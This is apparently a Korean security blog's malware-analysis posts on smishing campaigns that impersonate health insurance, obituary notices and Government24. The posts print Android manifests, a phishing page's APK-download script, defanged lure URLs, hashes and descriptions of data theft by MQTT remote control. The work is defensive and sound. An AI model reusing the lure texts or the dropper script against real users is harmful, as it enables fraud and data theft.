        A: android:name(0x01010003)="androidx.core.content.FileProvider" (Raw: "androidx.core.content.FileProvider")
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:authorities(0x01010018)="com.sms.yu.fileProvider" (Raw: "com.sms.yu.fileProvider")
        A: android:grantUriPermissions(0x0101001b)=(type 0x12)0xffffffff
        E: meta-data (line=29)
          A: android:name(0x01010003)="android.support.FILE_PROVIDER_PATHS" (Raw: "android.support.FILE_PROVIDER_PATHS")
          A: android:value(0x01010024)="" (Raw: "")
          A: android:resource(0x01010025)=@0x7f120003
      E: receiver (line=31)
        A: android:name(0x01010003)="badhbiij.ahgbdeak.afeaebfl.receiver.dabcbjdm" (Raw: "badhbiij.ahgbdeak.afeaebfl.receiver.dabcbjdm")
        A: android:permission(0x01010006)="android.permission.BROADCAST_SMS" (Raw: "android.permission.BROADCAST_SMS")
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
        E: intent-filter (line=32)
          A: android:priority(0x0101001c)=(type 0x10)0x7fffffff
          E: action (line=33)
            A: android:name(0x01010003)="android.provider.Telephony.SMS_RECEIVED" (Raw: "android.provider.Telephony.SMS_RECEIVED")
        E: intent-filter (line=35)
          A: android:priority(0x0101001c)=(type 0x10)0x7fffffff
          E: action (line=36)
            A: android:name(0x01010003)="android.provider.Telephony.WAP_PUSH_RECEIVED" (Raw: "android.provider.Telephony.WAP_PUSH_RECEIVED")
          E: data (line=37)
            A: android:mimeType(0x01010026)="application/vnd.wap.mms-message" (Raw: "application/vnd.wap.mms-message")
      E: provider (line=40)
        A: android:name(0x01010003)="androidx.startup.InitializationProvider" (Raw: "androidx.startup.InitializationProvider")
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:authorities(0x01010018)="badhbiij.ahgbdeak.afeaebfl.androidx-startup" (Raw: "badhbiij.ahgbdeak.afeaebfl.androidx-startup")
        E: meta-data (line=41)
          A: android:name(0x01010003)="androidx.work.WorkManagerInitializer" (Raw: "androidx.work.WorkManagerInitializer")
          A: android:value(0x01010024)="androidx.startup" (Raw: "androidx.startup")
      E: service (line=43)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.SystemAlarmService" (Raw: "androidx.work.impl.background.systemalarm.SystemAlarmService")
        A: android:enabled(0x0101000e)=@0x7f040003
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
      E: service (line=44)
        A: android:name(0x01010003)="androidx.work.impl.background.systemjob.SystemJobService" (Raw: "androidx.work.impl.background.systemjob.SystemJobService")
        A: android:permission(0x01010006)="android.permission.BIND_JOB_SERVICE" (Raw: "android.permission.BIND_JOB_SERVICE")
        A: android:enabled(0x0101000e)=@0x7f040005
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
      E: service (line=45)
        A: android:name(0x01010003)="androidx.work.impl.foreground.SystemForegroundService" (Raw: "androidx.work.impl.foreground.SystemForegroundService")
        A: android:enabled(0x0101000e)=@0x7f040004
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
      E: receiver (line=46)
        A: android:name(0x01010003)="androidx.work.impl.utils.ForceStopRunnable$BroadcastReceiver" (Raw: "androidx.work.impl.utils.ForceStopRunnable$BroadcastReceiver")
        A: android:enabled(0x0101000e)=(type 0x12)0xffffffff
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
      E: receiver (line=47)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryChargingProxy" (Raw: "androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryChargingProxy")
        A: android:enabled(0x0101000e)=(type 0x12)0x0
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=48)
          E: action (line=49)
            A: android:name(0x01010003)="android.intent.action.ACTION_POWER_CONNECTED" (Raw: "android.intent.action.ACTION_POWER_CONNECTED")
          E: action (line=50)
            A: android:name(0x01010003)="android.intent.action.ACTION_POWER_DISCONNECTED" (Raw: "android.intent.action.ACTION_POWER_DISCONNECTED")
      E: receiver (line=53)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryNotLowProxy" (Raw: "androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryNotLowProxy")
        A: android:enabled(0x0101000e)=(type 0x12)0x0
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=54)
          E: action (line=55)
            A: android:name(0x01010003)="android.intent.action.BATTERY_OKAY" (Raw: "android.intent.action.BATTERY_OKAY")
          E: action (line=56)
            A: android:name(0x01010003)="android.intent.action.BATTERY_LOW" (Raw: "android.intent.action.BATTERY_LOW")
      E: receiver (line=59)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.ConstraintProxy$StorageNotLowProxy" (Raw: "androidx.work.impl.background.systemalarm.ConstraintProxy$StorageNotLowProxy")
        A: android:enabled(0x0101000e)=(type 0x12)0x0
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=60)
          E: action (line=61)
            A: android:name(0x01010003)="android.intent.action.DEVICE_STORAGE_LOW" (Raw: "android.intent.action.DEVICE_STORAGE_LOW")
          E: action (line=62)
            A: android:name(0x01010003)="android.intent.action.DEVICE_STORAGE_OK" (Raw: "android.intent.action.DEVICE_STORAGE_OK")
      E: receiver (line=65)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.ConstraintProxy$NetworkStateProxy" (Raw: "androidx.work.impl.background.systemalarm.ConstraintProxy$NetworkStateProxy")
        A: android:enabled(0x0101000e)=(type 0x12)0x0
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=66)
          E: action (line=67)
            A: android:name(0x01010003)="android.net.conn.CONNECTIVITY_CHANGE" (Raw: "android.net.conn.CONNECTIVITY_CHANGE")
      E: receiver (line=70)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.RescheduleReceiver" (Raw: "androidx.work.impl.background.systemalarm.RescheduleReceiver")
        A: android:enabled(0x0101000e)=(type 0x12)0x0
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=71)
          E: action (line=72)
            A: android:name(0x01010003)="android.intent.action.BOOT_COMPLETED" (Raw: "android.intent.action.BOOT_COMPLETED")
          E: action (line=73)
            A: android:name(0x01010003)="android.intent.action.TIME_SET" (Raw: "android.intent.action.TIME_SET")
          E: action (line=74)
            A: android:name(0x01010003)="android.intent.action.TIMEZONE_CHANGED" (Raw: "android.intent.action.TIMEZONE_CHANGED")
      E: receiver (line=77)
        A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.ConstraintProxyUpdateReceiver" (Raw: "androidx.work.impl.background.systemalarm.ConstraintProxyUpdateReceiver")
        A: android:enabled(0x0101000e)=@0x7f040003
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=78)
          E: action (line=79)
            A: android:name(0x01010003)="androidx.work.impl.background.systemalarm.UpdateProxies" (Raw: "androidx.work.impl.background.systemalarm.UpdateProxies")
      E: receiver (line=82)
        A: android:name(0x01010003)="androidx.work.impl.diagnostics.DiagnosticsReceiver" (Raw: "androidx.work.impl.diagnostics.DiagnosticsReceiver")
        A: android:permission(0x01010006)="android.permission.DUMP" (Raw: "android.permission.DUMP")
        A: android:enabled(0x0101000e)=(type 0x12)0xffffffff
        A: android:exported(0x01010010)=(type 0x12)0xffffffff
        A: android:directBootAware(0x01010505)=(type 0x12)0x0
        E: intent-filter (line=83)
          E: action (line=84)
            A: android:name(0x01010003)="androidx.work.diagnostics.REQUEST_DIAGNOSTICS" (Raw: "androidx.work.diagnostics.REQUEST_DIAGNOSTICS")
      E: service (line=87)
        A: android:name(0x01010003)="androidx.room.MultiInstanceInvalidationService" (Raw: "androidx.room.MultiInstanceInvalidationService")
        A: android:exported(0x01010010)=(type 0x12)0x0
        A: android:directBootAware(0x01010505)=(type 0x12)0xffffffff
      E: meta-data (line=88)
        A: android:name(0x01010003)="ljwovijajpbc" (Raw: "ljwovijajpbc")
        A: android:value(0x01010024)="R5VucyZTxGZL5spDo/PJVA==_jlfwnpajqfbc" (Raw: "R5VucyZTxGZL5spDo/PJVA==_jlfwnpajqfbc")
      E: meta-data (line=89)
        A: android:name(0x01010003)="app_name" (Raw: "app_name")
        A: android:value(0x01010024)="badhbiij.ahgbdeak.afeaebfl.deiehddm" (Raw: "badhbiij.ahgbdeak.afeaebfl.deiehddm")

Android Permission

권한	설명
ACCESS_NETWORK_STATE	네트워크 상태에 대한 정보에 액세스할 수 있도록 허용합니다.
BIND_JOB_SERVICE	작업 서비스에 바인딩할 수 있도록 허용합니다.
BROADCAST_SMS	SMS 메시지를 브로드캐스트할 수 있도록 허용합니다.
DUMP	시스템 상태를 덤프하고 디버그 정보를 수집할 수 있도록 허용합니다.
FOREGROUND_SERVICE	포그라운드 서비스를 실행할 수 있도록 허용합니다.
GET_ACCOUNTS	계정 관련 정보에 액세스할 수 있도록 허용합니다.
INTERNET	인터넷에 액세스할 수 있도록 허용합니다.
READ_CONTACTS	연락처 정보를 읽을 수 있도록 허용합니다.
READ_EXTERNAL_STORAGE	외부 저장소의 콘텐츠를 읽을 수 있도록 허용합니다.
READ_PHONE_NUMBERS	전화 번호에 대한 읽기 권한을 허용합니다.
READ_PHONE_STATE	전화 상태 및 식별자 정보를 읽을 수 있도록 허용합니다.
READ_PRIVILEGED_PHONE_STATE	특권이 있는 전화 상태 정보에 대한 읽기 권한을 허용합니다.
READ_SMS	SMS(단문 메시지 서비스) 메시지를 읽을 수 있도록 허용합니다.
RECEIVE_BOOT_COMPLETED	부팅이 완료된 후에 방송을 수신하여 특정 작업을 수행할 수 있도록 허용합니다.
RECEIVE_MMS	MMS(멀티미디어 메시지 서비스)를 수신할 수 있도록 허용합니다.
RECEIVE_SMS	SMS 메시지를 수신할 수 있도록 허용합니다.
SEND_SMS	SMS 메시지를 보낼 수 있도록 허용합니다.
VIBRATE	진동을 제어할 수 있도록 허용합니다.
WAKE_LOCK	장치가 화면이 꺼진 상태에서도 작동할 수 있도록 허용합니다.
WRITE_EXTERNAL_STORAGE	외부 저장소에 콘텐츠를 쓸 수 있도록 허용합니다.

코드 분석

Web View(정상 사이트)

1. Web View(정상 사이트)를 보여 줍니다

2. send 메세지

3. 주소록 수집

4. 정보 유출지를 볼수 있음

]

5. 주소록 수집 및 유출

5. 갤러리 수집 및 유출

5. 정보 유출을 api

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

신고는 기존에 신고는 경찰청, 금감원, KISA에 따로 신고하고 절차가 복잡했는데 이번에 경찰과 금융감독원, 한국인터넷진흥원(KISA), 방송통신위원회, 통신 3사 직원 등이 합처서 운영되는 통합신고대응센터(112)로 신고 가능 하니 참고 하시면 좋습니다.

통합신고대응센터는 보이스피싱 피해 신고 창구를 112로 통합해 사건 접수뿐 아니라 악성 앱 등 범행수단 차단, 피해구제 및 지급정지와 추가예방 등을 한 번에 처리할 수 있게 했습니다. 피해가 없거나 단순 상담건인 경우에는 피해구제 방법을 안내하고 추가 예방 방법 등을 알려줍니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중!

open.kakao.com

국민건강보험 사칭 피싱 사이트 (23.12.03)

카고형 — Thu, 7 Dec 2023 22:55:42 +0900

공공기관 사칭 스미싱인 국민건강보험 피싱 사이트입니다.

해당 스미싱은 건강검사 통지서 관련으로 국민건강보험에서 보낸 것처럼 건강검진 안내 문구를 사칭해 스미싱 문자를 보내는 형태입니다. 스미싱 문자는 건강보험, 건강검사, 건강검진, 국민보험공단, 통지서, 통보문, 통보서, 신체검사, 통지내역 등 이러한 문구가 포함된 문자를 보내는 형태로 배포되고 있습니다.

저번달에 나온 국민건강보험 사칭 피싱 사이트 (23.11.01)와 차이점은 피싱 페이지가 바뀐 것이 확인 가능 합니다.

모르는 번호로 연락이 오면 항상 꼼꼼히 확인하셔서 피해 없으시길 바랍니다.

스미싱 문구

[국민보험공단]
신체검사 통지서내역 발급완료. 내용조회 http://URL

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

VirusTotal 탐지 결과

Avira (no cloud) : ANDROID/Malformed.ZIP.Gen

Cynet : Malicious (score: 99)

DrWeb : Android.Packed.15.origin

ESET-NOD32 : A Variant Of Android/TrojanDropper.Agent.LKS

F-Secure : Malware.ANDROID/Malformed.ZIP.Gen

Fortinet : Android/Agent.LKS!tr

Google : Detected

Ikarus : Trojan-Spy.AndroidOS.Letscall

Kaspersky : HEUR:Trojan-Spy.AndroidOS.FakeApp.q

ZoneAlarm by Check Point : HEUR:Trojan-Spy.AndroidOS.FakeApp.q

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출됩니다.

통합신고대응센터는 보이스피싱 피해 신고 창구를 112로 통합해 사건 접수뿐 아니라 악성 앱 등 범행수단 차단, 피해구제 및 지급정지와 추가예방 등을 한 번에 처리할 수 있게 했다. 피해가 없거나 단순 상담건인 경우에는 피해구제 방법을 안내하고 추가 예방 방법 등을 알려줍니다.

휴대전화 보안 그리고 악성 앱 제거 방법

[악성 앱] 부고장 사칭 스미싱 악성앱 분석 (23.11.26)

카고형 — Sat, 2 Dec 2023 20:46:36 +0900

지인 관련 스미싱인 부고장 사칭 피싱 사이트입니다.

해당 스미싱 문구는 지인 사칭으로 배포되고 있습니다. 지인 사칭 스미싱 문구는 결혼식, 돌잔치, 지인 행사, 부고 관련 메시지를 포함하여 보내고 있습니다. 해당 피싱 사이트는 부고 관련 메시지를 사칭하여 스미싱 문구를 베포 합니다.

정상적인 부고 메세지는 요새는 일반적으로 대부분 상주이름, 일시, 발인 일시, 장소가 문자에 포함되는데 부고 관련 사칭 스미싱은 해당 정보가 기입이 안되어 있는 게 확인됩니다. (장소, 일시등이 문자에 기입되어 있다고 정상은 아닙니다.)

스미싱 문구

문구)
"아버님께서 금일아침에 별세하셨기에 삼가 알려드립니다.. 장례식장주소 http://URL"

피싱 사이트 분석

해당 피싱 사이트는 접속 후 클릭을 하게 되면 apk 파일이 다운하게 됩니다.

스미싱 문구에는 장소가 포함되지 않았기 때문에 피싱 페이지에서 열기 버튼을 누르면 확인할 수 있는 것처럼 접속한 사용자가 클릭하게 끔 유도하는 형태로 보입니다.

부고장 사칭 피싱 사이트

HTML 분석

해당 페이지는 부고장 이미지를 보여주고, 클릭 시 악성앱을 다운로드하게 됩니다.

html 소스

	function downAlert(){
		alert("장례식장 장소와 시간을 보기위하여 확인을눌러주세요.");
		window.open("down.php");
	}
    var $main = $('.preview-main');
    var css_obj = $main.data('css');
    $main.css('background-color', css_obj.backgroundColor);

    $('.J_prev').on('click', ()=>{
        tabPage(1)
    });
    $('.J_next').on('click', ()=>{
        tabPage(-1)
    });
    var wrapper = document.getElementById('wrapper');
    function tabPage(is_up) {
        wrapper.contentWindow.postMessage(is_up, '*');
    }

이미지를 클릭하면 "장례식장 장소와 시간을 보기 위하여 확인 눌러주세요." 창이 뜨고, down.php 페이지로 넘어가게 됩니다.

클리시 창화면을 보여줌

down.php 페이지에서는 get 요청을 보내 "cloudflare"라는 클라우드 서버에 접속하여 최종적으로 악성앱을 다운하게 됩니다.

apk파일 다운

유포지 URL 주소

https://t[.]ly/FOT26
https://kor[.]iconlive[.]store/
https://kor[.]iconlive[.]store/down.php
https://kor[.]iconlive[.]store/data/apk/%EB%AA%A8%EB%B0%94%EC%9D%BC%20%EB%B6%80%EA%B3%A0.apk

해당 스미싱 문자에 포함된 URL을 누르게 되면 부고장 피싱 사이트로 접속하게 되며, 페이지에 있는 이미지 클릭 시 특정 페이지로 넘어가게 되며, 최종적으로는 APK파일을 다운로드하게 됩니다. 해당 APK 파일은 악성 앱입니다.

악성 앱 리소스 분석

APK 파일 정보

App Name: 부고장(개인용)
App Version : 1.0.6
Package Name : sedfkkerdf.esfwdclppq.fpqlcz

MD5: 674 cc4848662 d50 ca96 ea6 fc4 f27 dd15
SHA-1 : 4 e44340 e6 e1 d50 bcd0 bec8843162 f9 d2 d23 e5973
SHA-256 : 5 c0 bc752 a08 d556803 cd611 d628 a7 a7 cadd994 aec9 bd82 bfd604 e83 bde4849 d b
Vhash : 51 c2 e2523 d748 b1281 ba16 b75475 e661

VirusTotal 백신 탐지 결과

Avira (no cloud) : ANDROID/Malformed.ZIP.Gen
BitDefenderFalx : Android.Trojan.AgentSpy.DT
Cynet : Malicious (score: 99)
DrWeb : Android.Packed.15.origin
ESET-NOD32 : A Variant Of Android/TrojanDropper.Agent.LKS
F-Secure : Malware.ANDROID/Malformed.ZIP.Gen
Fortinet : Android/Agent.LKS! tr
Ikarus : Trojan-Dropper.AndroidOS.Agent
Kaspersky : HEUR:Trojan-Dropper.AndroidOS.Badpack.e
ZoneAlarm by Check Point : HEUR:Trojan-Dropper.AndroidOS.Badpack.e

VirusTotal 탐지 결과

Android Manifest

Activities 2 , Services 4, Receivers 1, Providers 1

<?xml version="1.0" encoding="UTF-8"?>
<manifest android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" android:tag="" android:versionCode="106" android:versionName="1.0.6" package="sedfkkerdf.esfwdclppq.fpqlcz" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415" xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-sdk android:minSdkVersion="24" android:tag="" android:targetSdkVersion="26"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" android:tag=""/>
  <uses-permission android:name="android.permission.READ_CONTACTS" android:tag=""/>
  <uses-permission android:name="android.permission.WRITE_CONTACTS" android:tag=""/>
  <uses-permission android:name="android.permission.READ_SMS" android:tag=""/>
  <uses-permission android:name="android.permission.SEND_SMS" android:tag=""/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" android:tag=""/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:tag=""/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" android:tag=""/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE" android:tag=""/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" android:tag=""/>
  <uses-permission android:name="android.permission.WAKE_LOCK" android:tag=""/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:tag=""/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" android:tag=""/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE" android:tag=""/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" android:tag=""/>
  <uses-permission android:name="android.permission.INTERNET" android:tag=""/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS" android:tag=""/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE" android:tag=""/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" android:tag=""/>
  <uses-feature android:glEsVersion="0x20000" android:required="true" android:tag=""/>
  <uses-feature android:name="android.hardware.telephony" android:required="false" android:tag=""/>
  <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:icon="@NP_MANAGER12/NP_MANAGER" android:label="@NP_MANAGER15/NP_MANAGER" android:name="cv3c.rep.i7p5.okt" android:networkSecurityConfig="@NP_MANAGER18/NP_MANAGER" android:roundIcon="@NP_MANAGER12/NP_MANAGER" android:supportsRtl="true" android:tag="" android:theme="@NP_MANAGER16/NP_MANAGER">
    <activity android:name="sedfkkerdf.esfwdclppq.fpqlcz.ui.ac.SplashActivity" android:tag="" android:theme="@NP_MANAGER16/NP_MANAGER">
      <intent-filter android:tag="">
        <action android:name="android.intent.action.MAIN" android:tag=""/>
        <category android:name="android.intent.category.LAUNCHER" android:tag=""/>
      </intent-filter>
    </activity>
    <activity-alias android:enabled="false" android:exported="true" android:icon="@android:color/transparent" android:label="" android:name="sedfkkerdf.esfwdclppq.fpqlcz.alias" android:tag="" android:targetActivity="sedfkkerdf.esfwdclppq.fpqlcz.ui.ac.SplashActivity">
      <intent-filter android:tag="">
        <action android:name="android.intent.action.MAIN" android:tag=""/>
        <category android:name="android.intent.category.LAUNCHER" android:tag=""/>
      </intent-filter>
    </activity-alias>
    <activity android:name="sedfkkerdf.esfwdclppq.fpqlcz.ui.ac.IndexActivity" android:tag=""/>
    <service android:name="sedfkkerdf.esfwdclppq.fpqlcz.keepalive.service.RunningService" android:permission="android.permission.BIND_JOB_SERVICE" android:tag=""/>
    <service android:name="sedfkkerdf.esfwdclppq.fpqlcz.keepalive.service.AssistService" android:tag=""/>
    <service android:enabled="true" android:exported="true" android:name="sedfkkerdf.esfwdclppq.fpqlcz.keepalive.service.PlayerMusicService" android:process=":music_service" android:tag=""/>
    <service android:name="org.eclipse.paho.android.service.MqttService" android:tag=""/>
    <receiver android:name="sedfkkerdf.esfwdclppq.fpqlcz.keepalive.receiver.BootCompletedReceiver" android:tag="">
      <intent-filter android:tag="">
        <action android:name="android.intent.action.PHONE_STATE" android:tag=""/>
      </intent-filter>
      <intent-filter android:priority="2147483647" android:tag="">
        <action android:name="android.intent.action.BOOT_COMPLETED" android:tag=""/>
      </intent-filter>
    </receiver>
    <provider android:authorities="sedfkkerdf.esfwdclppq.fpqlcz.provider" android:exported="false" android:grantUriPermissions="true" android:name="androidx.core.content.FileProvider" android:tag="">
      <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@NP_MANAGER18/NP_MANAGER" android:tag=""/>
    </provider>
    <meta-data android:name="jdpuyaazshgu" android:tag="" android:value="wvKWlGqv5M2msJgAUwNU0w==_mzacdobzmccv"/>
    <meta-data android:name="app_name" android:tag="" android:value="sedfkkerdf.esfwdclppq.fpqlcz.base.BaseApplication"/>
  </application>
</manifest>

Android Permission

권한	설명
ACCESS_WIFI_STATE	Wi-Fi 상태 및 정보에 액세스할 수 있도록 허용합니다.
READ_CONTACTS	연락처 정보를 읽을 수 있도록 허용합니다.
WRITE_CONTACTS	연락처에 쓸 수 있도록 허용합니다.
READ_SMS	SMS(단문 메시지 서비스) 메시지를 읽을 수 있도록 허용합니다.
SEND_SMS	SMS 메시지를 보낼 수 있도록 허용합니다.
READ_EXTERNAL_STORAGE	외부 저장소의 콘텐츠를 읽을 수 있도록 허용합니다.
WRITE_EXTERNAL_STORAGE	외부 저장소에 콘텐츠를 쓸 수 있도록 허용합니다.
SYSTEM_ALERT_WINDOW	시스템 경고 창을 표시할 수 있도록 허용합니다.
READ_PHONE_STATE	전화 상태 및 식별자 정보를 읽을 수 있도록 허용합니다.
REQUEST_IGNORE_BATTERY_OPTIMIZATIONS	배터리 최적화를 무시할 수 있도록 허용합니다.
WAKE_LOCK	장치가 화면이 꺼진 상태에서도 작동할 수 있도록 허용합니다.
ACCESS_NETWORK_STATE	네트워크 상태에 대한 정보에 액세스할 수 있도록 허용합니다.
INTERNET	인터넷에 액세스할 수 있도록 허용합니다.
GET_ACCOUNTS	계정 관련 정보에 액세스할 수 있도록 허용합니다.
FOREGROUND_SERVICE	포그라운드 서비스를 실행할 수 있도록 허용합니다.
RECEIVE_BOOT_COMPLETED	부팅이 완료된 후에 방송을 수신하여 특정 작업을 수행할 수 있도록 허용합니다.

Activities 2 , Services 4, Receivers 1, Providers 1와 16개의 권한을 사용하는 것을 알 수 있습니다.

코드분석

앱 실행시 assets 안에 gif 사진 파일을 보여주고, 아이콘 은닉, sms 기본앱 변경, 베터리 최적화, 부팅 시 앱 실행 기능을 수행 하고 서버와 mqtt 연결(로그인)을 하여 악성행위를 진행 합니다.
기기정보, 갤러리(사진, 동영상), 공동인증서, 계정, sms, 주소록, 앱 설치 목록을 수집 하고 mqtt handler 메세지을 이용하여 원격제어를 통해 특정 행위와 정보 유출 행위를 수행 합니다.

앱 실행시 화면을 보여줌
아이콘 은닉
베터리 최적화
sms 기본앱 변경
부팅시 앱 (서비스) 실행
mqtt 로그인
정보 수집 후 유출
공동 인증서 수집 유출
mqtt를 이용한 원격제어

악성 행위

1. 앱 실행시 화면을 보여줌

이미지를 보여줌 1

이미지를 보여줌 2

2. 아이콘 은닉

아이콘 은닉

3. 베터리 최적화

베터리 최적화

4. sms 기본앱 변경

sms 기본앱 변경

5. 부팅시 앱 (서비스) 실행

6. mqtt 로그인

7. 정보 수집 후 유출

디바이스, sms, 주소록, 계정 정보 수집 유출

정보 수집 후 유출

기기 정보 수집

sms 수집

주소록 정보 수집

계정 정보 수집

8. 공동 인증서 수집 유출

공동 인증서  수집 유츨

9. mqtt를 이용한 원격제어

핸들러 메세지를 이용하여 원격제어를 합니다. 원격제어를 이용하여 지정된 악성행위를 수행 한다.

2.\t휴대전화 정보 저장 확인
3.\t연락처 저장 확인
"연락처 삭제 주제"
4.\t메시지 내용 저장 확인
5.\t통화기록 저장 확인
6.\t사진 가져오기 OK
7.\t비디오 가져오기 확인
8.\t상임관리자가 원격으로 문자를 보내면 OK
14.\t 애플리케이션 목록 확인
주소록 전화 번호 추가
볼륨제어

헨들러 메세지 별 악성행위

볼륨 제어

설치된 앱 정보 수집 유출

원격지에서 받은 sms 메세지 송신 기능 1

원격지에서 받은 sms 메세지 송신 기능 2

이미지 동영상 수집 유출

네트워크 행위

각종 정보 유출, 로그인, 주소록 정보 유출

로그인

각종 정보 유출

주소록 정보 유출

해당 악성앱에 주요 유출 행위는 SMS, 주소록, 기기정보, 기기에 저장된 계정 정보, 사진, 동영상, 공동인증서 정보가 유출 됩니다.

검색 사이트에서 해당 회사나 기관들을 검색하시고, 정상 사이트는 검색 결과 대부분은 상위 페이지에 노출됩니다. 도메인 정보와 검색 결과를 비교해서 맞는지 확인 바랍니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중!

open.kakao.com

[악성 앱] 정부24 사칭 스미싱 악성앱 분석 (23.11.09)

카고형 — Wed, 29 Nov 2023 23:02:22 +0900

관공서 사칭 악성 앱 정부 24입니다.

정부24 관련 현재 배포되고 있는 스미싱 문구는 "쓰레기 무단투기로 단속되어 과태료 부과되였습니다." 내용이 포함해 스미싱 문자를 배포하고 있습니다.

정부 24(구 민원 24)에서 과태료, 범칙금 등으로 배포되고 있는데 "교통민원 24" 스미싱 문구와 비슷하게 범법 행위를 직접적으로 언급하여 문자를 보낼 것으로 추정됩니다.

해당 피싱 사이트 접속 시 해당 페이지는 "번호입력 - 본인인증 - 악성앱 설치" 순으로 진행되고, 피싱 사이트에서는 정상 사이트처럼 사용자를 속여 개인정보 수집을 진행하고 마지막에는 악성앱 설치를 유도하기 때문에 주의하셔야 합니다.

스미싱 문구

[민원24]쓰레기 무단투기로 단속되어 과태료 부과되였습니다. 과태료확인: URL

사진 출처 : 목포시

목포시에서 "관공서 사칭 문자 스미싱 피해 주의"라는 보도 자료를 참고하여 작성했습니다.

https://www.mokpo.go.kr/www/open_administration/city_news/notice?idx=520408&mode=view

지역여건

목포시청 목포시 대표 누리집 www.mokpo.go.kr

152.99.135.118

정상 배포 방식

정부에서 앱 다운로드 하는 경우는 특이사항이 아닌 이상 요구 하지 않을 것으로 생각됩니다.

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

해당 피싱 사이트는 번호 입력 - 본인인증 - 앱 다운 순으로 진행됩니다.

해당 피싱 사이트는 사칭 사이트인 정부24 홈페이지와 번호 입력 부분 빼고는 거의 비슷하게 생겼기 때문에 홈페이지만 보고 판단하기에는 일반 사용장 입장에서는 구분이 어려울 것으로 생각됩니다.

피싱 사이트 순서

피싱 사이트 정보 유출

입력 정보

입력 정보 유출

입력한 번호가 피싱 사이트 서버로 전송되는 것을 확인할 수 있습니다.

간편 인증 정보 유출

간편 인증 페이지에서는 입력한 이름, 주민번호, 통신사, 번호 가 유출 되는 것을 확인할 수 있습니다.

유포 URL 주소

www.goosmsi[.]com/6jIfin
https://www.seoulnsk[.]live/
https://www.seoulnsk[.]live/index/in?tel=
https://www.seoulnsk[.]live/index/down?tel=
https://www.seoulnsk[.]live/index/down-app?tel=

해당 스미싱 문자에 포함된 URL 주소로 접속하면 정부 24(구 민원24) 사칭 피싱 사이트로 접속하게 되며, 사용자에게 개인정보 요구 및 수집을 합니다. 마지막 페이지에서 설치하기 버튼을 클릭하면 APK 파일을 설치하게 되며, 해당 앱은 악성 앱입니다.

리소스 분석

APK 파일 정보

App Name: 정부24
App Version : 13.2.1.22
Package Name : com.moumoonmk.kr
MD5 : 5bdbf26d893930341be56864fd5dc82c
SHA-1 : 7571e1f9ab9756e81931f1a7cd10a79c52824587
SHA-256 : 539276363768922ae242148c86bfc3075e176f6aaa91856e5e867bb6c43d10f5
Vhash : 81c51febc3176db9b0b003f6178089d1

VirusTotal 탐지 결과

BitDefenderFalx : Android.Trojan.SpyAgent.JK
DrWeb : Android.Packed.15.origin
ESET-NOD32 : A Variant Of Android/TrojanDropper.Agent.LKS
Fortinet : Android/Agent.LKS!tr
Google : Detected
Ikarus : Trojan-Dropper.AndroidOS.Agent
Kaspersky : HEUR:Trojan-Dropper.AndroidOS.Badpack.e
Sophos : Android Packed App (PUA)
